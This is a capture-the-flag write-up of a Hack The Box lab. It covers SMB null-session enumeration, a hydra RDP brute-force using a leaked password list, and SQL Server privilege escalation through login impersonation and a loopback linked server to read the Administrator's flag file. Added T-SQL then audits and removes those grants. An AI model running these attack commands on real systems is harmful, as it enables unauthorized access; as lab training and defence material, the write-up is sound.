In this lab, we are tasked with compromising a third internal server within the inlanefreight.htb domain. This server is used to manage files and working materials, such as forms, and it also hosts a database whose purpose is not immediately clear. Our objective is to gain administrative privileges by exploiting vulnerabilities in the server's configuration.
Questions:
- What file can you retrieve that belongs to the user "simon"? (Format: filename.txt)
- Enumerate the target and find a password for the user Fiona. What is her password?
- Once logged in, what other user can we compromise to gain admin privileges?
- Submit the contents of the flag.txt file on the Administrator Desktop.
Steps to Solution
1. Network and Service Enumeration
First, we perform a comprehensive network scan using nmap to identify open ports and running services:
nmap -sV -sC -Pn $TARGET_IP
Results:
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds?
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000
3389/tcp open ms-wbt-server Microsoft Terminal Services
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
2. SMB Enumeration
To explore the SMB shares available on the target, we use smbclient with a null session (-N, no password):
smbclient -N -L //$TARGET_IP/
Results:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
Home Disk
IPC$ IPC Remote IPC
Next, we list the contents of the Home share, which also accepts an empty password:
smbclient //10.129.XXX.XX/Home
Password for [WORKGROUP\htb-ac-552074]:
smb: \> recurse ON
smb: \> prompt OFF
smb: \> ls
. D 0 Thu Apr 21 16:18:21 2022
.. D 0 Thu Apr 21 16:18:21 2022
HR D 0 Thu Apr 21 15:04:39 2022
IT D 0 Thu Apr 21 15:11:44 2022
OPS D 0 Thu Apr 21 15:05:10 2022
Projects D 0 Thu Apr 21 15:04:48 2022
\HR
. D 0 Thu Apr 21 15:04:39 2022
.. D 0 Thu Apr 21 15:04:39 2022
\IT
. D 0 Thu Apr 21 15:11:44 2022
.. D 0 Thu Apr 21 15:11:44 2022
Fiona D 0 Thu Apr 21 15:11:53 2022
John D 0 Thu Apr 21 16:15:09 2022
Simon D 0 Thu Apr 21 16:16:07 2022
\OPS
. D 0 Thu Apr 21 15:05:10 2022
.. D 0 Thu Apr 21 15:05:10 2022
\Projects
. D 0 Thu Apr 21 15:04:48 2022
.. D 0 Thu Apr 21 15:04:48 2022
\IT\Fiona
. D 0 Thu Apr 21 15:11:53 2022
.. D 0 Thu Apr 21 15:11:53 2022
creds.txt A 118 Thu Apr 21 15:13:11 2022
\IT\John
. D 0 Thu Apr 21 16:15:09 2022
.. D 0 Thu Apr 21 16:15:09 2022
information.txt A 101 Thu Apr 21 16:14:58 2022
notes.txt A 164 Thu Apr 21 16:13:40 2022
secrets.txt A 99 Thu Apr 21 16:15:55 2022
\IT\Simon
. D 0 Thu Apr 21 16:16:07 2022
.. D 0 Thu Apr 21 16:16:07 2022
random.txt A 94 Thu Apr 21 16:16:48 2022
7706623 blocks of size 4096. 3165043 blocks available
smb: \>
To download files, use the get command (one file) or mget * (all files in the current directory). To read a downloaded file without leaving the smbclient prompt, use !cat filename: the leading ! runs the command in a local shell. The information in these files can be very useful.
smb: \> cd IT/John
smb: \IT\John\> ls
. D 0 Thu Apr 21 16:15:09 2022
.. D 0 Thu Apr 21 16:15:09 2022
information.txt A 101 Thu Apr 21 16:14:58 2022
notes.txt A 164 Thu Apr 21 16:13:40 2022
secrets.txt A 99 Thu Apr 21 16:15:55 2022
7706623 blocks of size 4096. 3141055 blocks available
smb: \IT\John\> mget *
Get file information.txt? y
getting file \IT\John\information.txt of size 101 as information.txt (2.9 KiloBytes/sec) (average 2.9 KiloBytes/sec)
Get file notes.txt? y
getting file \IT\John\notes.txt of size 164 as notes.txt (0.6 KiloBytes/sec) (average 0.8 KiloBytes/sec)
Get file secrets.txt? y
getting file \IT\John\secrets.txt of size 99 as secrets.txt (2.8 KiloBytes/sec) (average 1.0 KiloBytes/sec)
smb: \IT\John\> !cat information.txt
To do:
- Keep testing with the database.
- Create a local linked server.
- Simulate Impersonation.
smb: \IT\John\> !cat notes.txt
Hack The Box is a massive, online cybersecurity training platform, allowing individuals, companies, universities and all kinds of organizations around the world ...
smb: \IT\John\> !cat secrets.txt
Password Lists:
1234567
(DK02ka-dsaldS
Inlanefreight2022
Inlanefreight2022!
TestingDB123
smb: \IT\John\>
Try to use one of these for password attacks.
3. Password Discovery
Using the hydra tool, we brute-force the Remote Desktop Protocol (RDP) service to discover the password for the user Fiona:
hydra -l Fiona -P XXXXX.txt 10.129.xxx.xx rdp
Result:
[3389][rdp] host: 10.129.xxx.xx login: Fiona password: $PASSWORD
4. Remote Desktop Access
With the credentials obtained, we establish an RDP connection:
rdesktop -u Fiona -p '$PASSWORD' $TARGET_IP
5. SQL Server Enumeration and Privilege Escalation
Once connected, we use sqlcmd to enumerate SQL Server tables and execute commands to escalate privileges:
PS C:\Users\Fiona> sqlcmd
1> SELECT table_name FROM master.INFORMATION_SCHEMA.TABLES;
2> go
To escalate privileges, we switch the execution context to another login (EXECUTE AS LOGIN only succeeds if Fiona's login has been granted the IMPERSONATE permission on john's login) and then check whether the new context is a member of the sysadmin server role:
EXECUTE AS LOGIN = 'john';
SELECT SYSTEM_USER;
SELECT IS_SRVROLEMEMBER('sysadmin');
go
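The escalation step above depends on a server-level IMPERSONATE grant. The following T-SQL is an added defender-side example, not part of the lab writeup: it lists every login-to-login impersonation grant on the instance, flags those whose target is a sysadmin, and revokes the one that creates the escalation path. The login names Fiona and john come from the writeup; run it as a sysadmin in sqlcmd or SSMS against the instance under review.

```sql
-- Added example (not from the lab writeup): audit and remove server-level
-- IMPERSONATE grants, the permission behind EXECUTE AS LOGIN = 'john'.

-- 1. Who may impersonate whom, and does the impersonated login hold sysadmin?
SELECT
    grantee.name                              AS grantee_login,       -- holder of the permission (e.g. Fiona)
    target.name                               AS impersonated_login,  -- login they may switch to (e.g. john)
    IS_SRVROLEMEMBER('sysadmin', target.name) AS target_is_sysadmin,  -- 1 = direct path to sysadmin
    p.state_desc                              AS grant_state
FROM sys.server_permissions AS p
JOIN sys.server_principals AS grantee ON grantee.principal_id = p.grantee_principal_id
JOIN sys.server_principals AS target  ON target.principal_id  = p.major_id
WHERE p.class_desc       = 'SERVER_PRINCIPAL'   -- permission scoped to a login
  AND p.permission_name  = 'IMPERSONATE'
  AND p.state IN ('G', 'W');                    -- GRANT and GRANT WITH GRANT OPTION

-- 2. The blanket server-scoped variant (SQL Server 2014 and later) is just as dangerous.
SELECT grantee.name AS grantee_login, p.permission_name, p.state_desc
FROM sys.server_permissions AS p
JOIN sys.server_principals AS grantee ON grantee.principal_id = p.grantee_principal_id
WHERE p.class_desc = 'SERVER' AND p.permission_name = 'IMPERSONATE ANY LOGIN';

-- 3. Remediation: revoke the grant reported above (names from the writeup).
REVOKE IMPERSONATE ON LOGIN::[john] FROM [Fiona];

-- 4. Verify: the same login should now see no row for john in the first query,
--    and the impersonation attempt fails with error 15406 (cannot execute as the server principal).
```

Impersonation that is genuinely needed for a job or application should be granted to a dedicated, non-sysadmin login rather than to an interactive user, and EXECUTE AS activity can be captured with SQL Server Audit so that a context switch to a privileged login is visible to the SOC.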
Finally, we enumerate the linked servers and execute queries through them. The linked server local.test.linked.srv points back at this same instance (compare @@servername in the result), and the login mapping on that link gives us a more privileged context on the "remote" side; the IS_SRVROLEMEMBER check in the first query confirms whether that context is sysadmin, which is what allows OPENROWSET(BULK ...) to read the flag file from the Administrator's desktop:
SELECT srvname, isremote FROM sysservers;
go
EXECUTE('SELECT @@servername, @@version, SYSTEM_USER, IS_SRVROLEMEMBER(''sysadmin'')') AT [local.test.linked.srv];
go
execute ('select * from OPENROWSET(BULK ''C:/Users/Administrator/desktop/flag.txt'', SINGLE_CLOB) AS Contents') at [local.test.linked.srv];
go
HTB{46u$**********_$3rv3r$}
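The loopback linked server is the misconfiguration that turns an impersonated login into file-system access. The following T-SQL is an added defender-side example, not part of the lab writeup: it shows, for every linked server, where it points, whether remote execution (RPC Out) is enabled, and which local logins are mapped to which remote login, and then removes the catch-all mapping and disables RPC Out. The linked server name local.test.linked.srv comes from the writeup; svc_reports and svc_reports_remote in the commented alternative are hypothetical names.

```sql
-- Added example (not from the lab writeup): audit linked server configuration
-- and the login mapping that makes EXECUTE (...) AT [srv] run with elevated rights.

-- 1. Linked servers, their target, and the rights each local login gets on the far side.
SELECT
    s.name                    AS linked_server,
    s.data_source             AS points_to,            -- same host/instance = loopback, the red flag here
    s.is_rpc_out_enabled,                              -- 1 = EXECUTE (...) AT [srv] is allowed
    s.is_data_access_enabled,                          -- 1 = OPENQUERY / four-part names are allowed
    ll.local_principal_id,                             -- 0 = default mapping, applies to ALL local logins
    lp.name                   AS local_login,          -- NULL together with 0 above means "everyone"
    ll.uses_self_credential,                           -- 1 = pass the caller's own credentials through
    ll.remote_name            AS remote_login,         -- fixed remote login; check its role membership
    IS_SRVROLEMEMBER('sysadmin', ll.remote_name) AS remote_is_sysadmin  -- meaningful for loopback links only
FROM sys.servers AS s
LEFT JOIN sys.linked_logins    AS ll ON ll.server_id    = s.server_id
LEFT JOIN sys.server_principals AS lp ON lp.principal_id = ll.local_principal_id
WHERE s.is_linked = 1;

-- 2. Remediation for a loopback link whose default mapping lands on a privileged login:
--    stop remote procedure execution through the link ...
EXEC sp_serveroption @server = 'local.test.linked.srv', @optname = 'rpc out', @optvalue = 'false';
--    ... and drop the default (all-logins) mapping; @locallogin = NULL selects that default entry.
EXEC sp_droplinkedsrvlogin @rmtsrvname = 'local.test.linked.srv', @locallogin = NULL;

-- 3. If the link is still needed for one job, map only that login to a least-privileged remote login
--    (hypothetical names; store the password in a managed secret, not in a script):
-- EXEC sp_addlinkedsrvlogin @rmtsrvname = 'local.test.linked.srv', @useself = 'false',
--      @locallogin = 'svc_reports', @rmtuser = 'svc_reports_remote', @rmtpassword = '<managed secret>';

-- 4. Re-run the audit in step 1: is_rpc_out_enabled should be 0 and no row should
--    show local_principal_id = 0 with a sysadmin remote login.
```

Two further points follow from the writeup's last query: OPENROWSET(BULK ...) needs the ADMINISTER BULK OPERATIONS permission (held by sysadmin and bulkadmin), and the file is read by the SQL Server service account, so that account having read access to C:\Users\Administrator is a second finding worth raising alongside the linked server itself.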
By systematically enumerating services, discovering valid credentials, and leveraging SQL Server commands, we were able to compromise multiple user accounts, ultimately gaining administrative access to the server. The contents of the flag.txt file were retrieved from the Administrator's desktop, completing the task.